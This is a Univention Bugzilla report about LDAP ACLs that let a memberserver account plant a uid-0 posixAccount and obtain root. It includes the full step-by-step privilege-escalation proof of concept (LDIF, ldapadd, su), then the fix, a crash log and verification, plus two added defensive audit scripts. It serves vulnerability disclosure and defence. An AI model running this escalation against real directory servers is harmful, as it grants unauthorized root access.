Univention Bugzilla – Bug 41723
univention-virtual-machine-manager-schema - take over complete domain as memberserver
Last modified: 2021-06-23 07:29:09 CEST
The ACL rules in the package univention-virtual-machine-manager-schema have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort:
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
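A defender's audit for the object shape described in this report, added here as an example that is not part of the bug report or of the Univention package: it reads an LDIF export (the sample below is constructed, with a placeholder password hash) and flags posixAccount entries that claim uid/gid 0 or sit outside the containers where accounts are expected; the container list is an assumption.

```python
import base64
# Constructed sample LDIF (slapcat style): one ordinary account and a
# posixAccount planted under cn=apps with uid/gid 0; the hash is a placeholder.
SAMPLE_LDIF = """\
dn: uid=alice,cn=users,dc=example,dc=test
objectClass: posixAccount
uidNumber: 2001
gidNumber: 5001

dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,
 dc=example,dc=test
objectClass: univentionApp
objectClass: posixAccount
uidNumber: 0
gidNumber: 0
userPassword:: e2NyeXB0fVBMQUNFSE9MREVS
"""
# Assumption: POSIX accounts are only expected below these containers.
ACCOUNT_CONTAINERS = ("cn=users,", "cn=computers,")

def parse_ldif(text):
    """Unfold continuation lines, decode '::' base64 values, one dict per entry."""
    entries, attrs = [], {}
    for line in text.replace("\n ", "").splitlines() + [""]:  # "" flushes last entry
        if not line.strip():
            if attrs:
                entries.append(attrs)
                attrs = {}
            continue
        name, _, rest = line.partition(":")
        value = base64.b64decode(rest[1:].strip()).decode() if rest.startswith(":") else rest.strip()
        attrs.setdefault(name.lower(), []).append(value)
    return entries

def find_rogue_accounts(entries):
    """Flag posixAccount entries with uid/gid 0 or outside the expected containers."""
    findings = []
    for e in entries:
        dn = e.get("dn", [""])[0]
        if "posixaccount" not in {c.lower() for c in e.get("objectclass", [])}:
            continue
        reasons = []
        if "0" in (e.get("uidnumber", [""])[0], e.get("gidnumber", [""])[0]):
            reasons.append("uidNumber or gidNumber is 0")
        if not any(c in dn.lower() for c in ACCOUNT_CONTAINERS):
            reasons.append("posixAccount outside user/computer containers")
        if reasons:
            findings.append((dn, reasons))
    return findings
```

Run it against `slapcat` output on a DC master to get a list of (dn, reasons) pairs; an empty list means no posixAccount outside the expected containers and no uid/gid 0 claims.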
univention-virtual-machine-manager-schema.yaml: r70818 | YAML Bug #41723

univention-virtual-machine-manager-schema (6.0.1-2):
r70815 | Bug #41723: uniupdatecopyright
r70814 | Bug #41723: restrict access to UVMM object classes for memberservers and domaincontrollers
Crashes my update and leaves system without a working LDAP server:

univention-virtual-machine-manager-schema (6.0.1-2.75.201607041950) wird eingerichtet ...
Neue Version der Konfigurationsdatei /etc/univention/templates/files/etc/ldap/slapd.conf.d/66univention-ldap-server_acl-master-uvmm wird installiert ...
Multifile: /etc/ldap/slapd.conf
Restarting ldap server(s).
Stopping ldap server(s): slapd ...done.
Starting ldap server(s): slapd ...DITContentRuleDescription = "(" whsp
	numericoid whsp ; StructuralObjectClass identifier
	[ "NAME" qdescrs ]
	[ "DESC" qdstring ]
	[ "OBSOLETE" whsp ]
	[ "AUX" oids ] ; Auxiliary ObjectClasses
	[ "MUST" oids ] ; AttributeTypes
	[ "MAY" oids ] ; AttributeTypes
	[ "NOT" oids ] ; AttributeTypes
	whsp ")"
failed.
577a88dc /usr/share/univention-ldap/schema/univention-virtual-machine-manager.schema: line 270 ditcontentrule: Unexpected token before )
DITContentRuleDescription = "(" whsp
	numericoid whsp ; StructuralObjectClass identifier
	[ "NAME" qdescrs ]
	[ "DESC" qdstring ]
	[ "OBSOLETE" whsp ]
	[ "AUX" oids ] ; Auxiliary ObjectClasses
	[ "MUST" oids ] ; AttributeTypes
	[ "MAY" oids ] ; AttributeTypes
	[ "NOT" oids ] ; AttributeTypes
	whsp ")"
slapschema: bad configuration file!.
2016-07-04 18:03:40.443670527+02:00 (in joinscript_init)
ucs-school-ldap-acls-master (14.0.1-7.76.201607041949) wird eingerichtet ...
2016-07-04 18:03:40.841997337+02:00 (in joinscript_init)
Traceback (most recent call last):
  File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
    output = univention.admincli.admin.doit(arglist)
  File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
    out=_doit(arglist)
  File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
    co=univention.admin.config.config(configRegistry['ldap/master'])
  File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
    base=univention.admin.uldap.getBaseDN(host)
  File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
    result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
  File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
    return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
  File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
    return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
  File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
    self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
  File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
    raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
univention-virtual-machine-manager-schema (6.0.1-3): r70824 | Bug #41723: fix syntax error in LDAP schema
YAML: OK
Code review: OK
r70814: OK
r70815: OK
r70824: OK
Tests: OK
KVM: OK
EC2: OK
OpenStack: OK
I just saw a DC backup which couldn't join because the schema wasn't installed.

57849f5f /etc/ldap/slapd.conf: line 166: unknown attr "@univentionVirtualMachine" in to clause
57849f5f <access clause> ::= access to <what> [ by <who> [ <access> ] [ <control> ] ]+
<what> ::= bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] [attrs=<attrspec>]
<attrspec> ::= <attrname> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist>
<attrlist> ::= <attr> [ , <attrlist> ]
<attr> ::= <attrname> | @<objectClass> | !<objectClass> | entry | children
<who> ::= [ bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ]
	[ realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ]
	[dnattr=<attrname>] [realdnattr=<attrname>]
	[group[/<objectclass>[/<attrname>]][.<style>]=<group>]
	[peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>]
	[domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>]
	[dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]]
	[ssf=<n>] [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>]
<style> ::= exact | regex | base(Object)
<dnstyle> ::= base(Object) | one(level) | sub(tree) | children | exact | regex
<attrstyle> ::= exact | regex | base(Object) | one(level) | sub(tree) | children
<peernamestyle> ::= exact | regex | ip | ipv6 | path
<domainstyle> ::= exact | regex | base(Object) | sub(tree)
<access> ::= [[real]self]{<level>|<priv>}
<level> ::= none|disclose|auth|compare|search|read|{write|add|delete}|manage
<priv> ::= {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+
<control> ::= [ stop | continue | break ]
dynacl: <name>=ACI <pattern>=<attrname>
slapschema: bad configuration file!.
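A pre-deployment check for the mismatch behind this error, added here as an example that is not Univention's code: it extracts every @objectClass / !objectClass referenced in slapd.conf access directives and reports those that no loaded schema file defines, which is what slapd rejects as "unknown attr" before the server can start. The schema and ACL fragments are constructed; the OIDs, exampleAlias and exampleUndefinedClass are placeholders.

```python
import re

# Constructed schema fragment: OIDs are placeholders; the first class name is
# the one from the slapd error above, the second exercises the NAME ( ... ) form.
SAMPLE_SCHEMA = """\
objectclass ( 1.1.1.1 NAME 'univentionVirtualMachine'
    DESC 'placeholder definition' SUP top STRUCTURAL MAY ( cn ) )
objectclass ( 1.1.1.2 NAME ( 'exampleAlias' 'exampleAliasTwo' ) SUP top AUXILIARY )
"""
# Constructed ACL fragment in slapd.conf syntax; exampleUndefinedClass is
# deliberately absent from the schema above.
SAMPLE_ACL = """\
access to attrs=@univentionVirtualMachine,!exampleUndefinedClass,entry
    by dn.subtree="cn=dc,cn=computers,dc=example,dc=test" write
    by * read
access to *
    by * read
"""

OBJECTCLASS_RE = re.compile(
    r"objectclass\s*\(\s*[\w.:-]+\s+NAME\s+(?:'([^']+)'|\(([^)]*)\))", re.I)

def schema_objectclasses(schema_text):
    """Lowercased names of every objectclass defined in a schema file,
    handling both NAME 'x' and NAME ( 'x' 'y' ) forms."""
    names = set()
    for single, multi in OBJECTCLASS_RE.findall(schema_text):
        names.update(n.lower() for n in ([single] if single else re.findall(r"'([^']+)'", multi)))
    return names

def acl_objectclass_refs(conf_text):
    """Object classes referenced as @class or !class inside attrs= lists of
    access directives, in the order they appear."""
    refs = []
    for m in re.finditer(r"attrs=(\S+)", conf_text):
        refs += [item[1:] for item in m.group(1).split(",") if item[:1] in ("@", "!")]
    return refs

def undefined_acl_classes(conf_text, schema_text):
    """Classes an ACL refers to that the given schema text does not define;
    an empty list means slapd will not trip over the to-clause at startup."""
    defined = schema_objectclasses(schema_text)
    return sorted({r for r in acl_objectclass_refs(conf_text) if r.lower() not in defined})
```

Feed it the concatenated schema files slapd actually includes and the rendered /etc/ldap/slapd.conf; running it with an empty schema string shows what a host without the UVMM schema would report.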
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.

The join seems to have succeeded.
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.
>
> 57849f5f /etc/ldap/slapd.conf: line 166: unknown attr "@univentionVirtualMachine" in to clause
> 57849f5f <access clause> ::= access to <what> [ by <who> [ <access> ] [ <control> ] ]+
> <what> ::= bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] [attrs=<attrspec>]
> <attrspec> ::= <attrname> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist>
> <attrlist> ::= <attr> [ , <attrlist> ]
> <attr> ::= <attrname> | @<objectClass> | !<objectClass> | entry | children
> <who> ::= [ bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ]
> 	[ realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ]
> 	[dnattr=<attrname>] [realdnattr=<attrname>]
> 	[group[/<objectclass>[/<attrname>]][.<style>]=<group>]
> 	[peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>]
> 	[domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>]
> 	[dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]]
> 	[ssf=<n>] [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>]
> <style> ::= exact | regex | base(Object)
> <dnstyle> ::= base(Object) | one(level) | sub(tree) | children | exact | regex
> <attrstyle> ::= exact | regex | base(Object) | one(level) | sub(tree) | children
> <peernamestyle> ::= exact | regex | ip | ipv6 | path
> <domainstyle> ::= exact | regex | base(Object) | sub(tree)
> <access> ::= [[real]self]{<level>|<priv>}
> <level> ::= none|disclose|auth|compare|search|read|{write|add|delete}|manage
> <priv> ::= {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+
> <control> ::= [ stop | continue | break ]
> dynacl: <name>=ACI <pattern>=<attrname>
> slapschema: bad configuration file!.

I've split it into Bug #41782.

(In reply to Florian Best from comment #6)
> (In reply to Florian Best from comment #5)
> > I just saw a DC backup which couldn't join because the schema wasn't
> > installed.
> The join seems to have succeeded.

Verified.
<http://errata.software-univention.de/ucs/4.1/214.html>